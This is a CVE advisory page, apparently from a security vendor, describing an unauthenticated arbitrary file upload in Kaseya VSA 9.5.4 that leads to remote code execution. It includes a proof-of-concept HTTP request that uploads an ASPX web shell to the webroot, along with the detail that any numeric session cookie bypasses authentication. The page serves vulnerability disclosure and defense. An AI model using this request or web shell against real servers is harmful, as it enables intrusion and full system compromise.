CVE-2021-30118
Last modified
CVE-2021-30118 is a critical-severity vulnerability rated 9.8/10 on the CVSS scale. An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. EPSS estimates a 60.08% chance of exploitation in the next 30 days.
Description
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Kaseya | Vsa | < 9.5.5 |
References
- https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/Patch, Third Party Advisory
- https://csirt.divd.nl/CVE-2021-30118Exploit, Third Party Advisory
- https://csirt.divd.nl/DIVD-2021-00011Patch, Third Party Advisory
- https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021Release Notes, Vendor Advisory
- https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/Patch, Third Party Advisory
- https://csirt.divd.nl/CVE-2021-30118Exploit, Third Party Advisory
- https://csirt.divd.nl/DIVD-2021-00011Patch, Third Party Advisory
- https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021Release Notes, Vendor Advisory
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2021-30118?
How severe is CVE-2021-30118?
How do I fix CVE-2021-30118?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2021
- CVE-2021-30111A stored XSS vulnerability exists in Web-School ERP V 5.0 vi…5.4
- CVE-2021-30112Web-School ERP V 5.0 contains a cross-site request forgery (…6.5
- CVE-2021-30113A blind XSS vulnerability exists in Web-School ERP V 5.0 via…6.1
- CVE-2021-30114Web-School ERP V 5.0 contains a cross-site request forgery (…6.5
- CVE-2021-30116Kaseya VSA before 9.5.7 allows credential disclosure, as exp…9.8
- CVE-2021-30117The API call /InstallTab/exportFldr.asp is vulnerable to a s…8.8
- CVE-2021-30119Authenticated reflective XSS in HelpDeskTab/rcResults.asp Th…5.4
- CVE-2021-3012A cross-site scripting (XSS) vulnerability in the Document L…5.4
- CVE-2021-30120Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA r…7.5
- CVE-2021-30121Semi-authenticated local file inclusion The contents of arbi…6.5
- CVE-2021-30123FFmpeg <=4.3 contains a buffer overflow vulnerability in lib…8.8
- CVE-2021-30124The unofficial vscode-phpmd (aka PHP Mess Detector) extensio…9.8
Are you affected by CVE-2021-30118?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
